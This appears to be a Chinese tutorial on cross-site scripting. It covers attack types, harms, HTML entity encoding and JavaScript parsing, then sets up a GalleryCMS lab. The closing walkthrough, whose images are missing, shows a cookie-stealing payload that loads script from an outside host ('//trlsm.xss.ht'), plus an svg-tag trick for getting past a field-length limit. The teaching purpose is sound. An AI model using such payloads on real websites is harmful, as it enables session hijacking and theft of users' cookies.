XSS简介
XSS(Cross Site Scripting):跨站脚本攻击。
XSS的原理是:攻击者在web页面中会插入一些恶意攻击的script代码。普通用户在浏览该页面的时候,此时嵌入到web页面中script代码会按照计划执行,以此达到恶意攻击用户的目的。
XSS攻击分类:
XSS漏洞一般有两种类型攻击。
一类是来自内部的攻击,主要指的是利用WEB程序自身的漏洞,提交特殊的字符串,从而使得跨站页面直接存在于被攻击站点上,这个字符串被称为跨站语句。这一类攻击所利用的漏洞非常类似于SQL Injection漏洞,都是WEB程序没有对用户输入作充分的检查和过滤。
另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个跨站网页放在自己的服务器上,然后通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低。
那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。
反射型XSS:诱使用户点击一个恶意链接,才能攻击成功,即将用户输入的数据返回给浏览器,反射型XSS也叫做“非持久型XSS”
存储型XSS:将用户输入的数据存储到服务器端,这种XSS有很强的稳定性,所以也叫做持久型XSS。比如在一个页面里植入了恶意代码,访问到这个页面的所有人的浏览器都会执行这段恶意代码。
DOM Based XSS:通过修改页面的DOM节点形成的XSS
xss会造成的危害
1、网络钓鱼,包括盗取各类用户账号;
2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作;
3、劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等;
4、强制弹出广告页面、刷流量等;
5、网页挂马,进行恶意操作,例如任意篡改页面信息、删除文章等;
6、进行大量的客户端攻击,如DDoS攻击;
7、获取客户端信息,例如用户的浏览历史、真实IP、开放端口等;
8、控制受害者机器向其他网站发起攻击;
9、结合其他漏洞,如CSRF漏洞,实施进一步作恶;
10、提升用户权限,包括进一步渗透网站;
11、传播跨站脚本蠕虫等;
HTML实体编码
HTML 实体是一段以连字符号(&)开头、以分号(;)结尾的字符串。用以显示不可见字符及保留字符(如 HTML 标签)。在前端,一般为了避免 XSS 攻击,会将 <> 编码为 < 与 >,这些就是 HTML 实体编码。
字符实体
在 HTML 中,某些字符是预留的。在 HTML 中不能使用小于号(<)和大于号(>),这是因为浏览器会误认为它们是标签。如果希望正确地显示预留字符,我们必须在 HTML 源代码中使用字符实体
JavaScript解析
JavaScript解析过程分为两个阶段,一个是编译阶段,另外一个就是执行阶段。
编译阶段就是我们常说的JavaScript预解析(预处理)阶段,在这个阶段JavaScript解释器将完成把JavaScript脚本代码转换到字节码。在编译阶段JavaScript解释器借助执行环境把字节码生成机械码,并顺序执行
搭建galleryCMS的服务器。
1.在github上下载好文件后然后将解压包解压到phpstudy_pro/WWW目录,找到application/config/database.php文件,修改文件中的数据库的用户名和密码为自己本机上的用户名和密码一样。
2.打开服务器和数据库,新增一个网站,将解压的GalleryCMS了路径放到根目录下面,域名设置为文件名。重启Apache服务和MySQL。
3.注册galleryCMS时发现会出现问题
提示"last_ip"不能为空
解决方法:cmd进入数据库,添加"last_ip"字段,手动插入数据
?
?
?明可以使用js代码
为了获取到对方的cookie,尝试使用>$.getScript(“//trlsm.xss.ht”),
?
在源码当中我说。们规定的最长字符长度是:35
?
使用< svg>标签进行一个测试。
?
可以找到一个svg的标签,来进行绕过。
这些个必备的命令已经有29个字符了,只能将域名缩短
?
?
?
?
?
?